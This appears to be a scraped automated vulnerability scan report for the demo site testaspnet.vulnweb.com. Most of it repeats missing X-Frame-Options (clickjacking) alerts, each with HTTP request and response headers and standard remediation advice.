class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 
href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td 
style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td 
align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a 
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 13914
Response body (13914 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13912
Response body (13912 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13269
Response body (13269 bytes)
Parameter
X-Frame-Options
Solution
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 22687
Response body (22687 bytes)
Parameter
X-Frame-Options
Solution
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30393
Response body (30393 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 17827
Response body (17827 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 22752
Response body (22752 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header.
Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 30454
Response body (30454 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 17888
Response body (17888 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Signup.aspx
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (315 bytes)
GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 12954
Response body (12954 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/about.aspx
Content-Length: 1027
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1027 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 14467
Response body (14467 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com
Content-Length: 1025
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1025 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 12371
Response body (12371 bytes)
Parameter: X-Frame-Options
Solution: Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/login.aspx
Content-Length: 1197
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1197 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 13281
Response body (13281 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Content-Length: 6543
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (6543 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 22723
Response body (22723 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags
Alert description
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (414 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Content-Length: 10975
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10975 bytes)
QoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 30429
Response body (30429 bytes)
Parameter X-Frame-Options
Solution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY). Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags
Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request
Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Content-Length: 3745
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (3745 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 17859
Response body (17859 bytes)
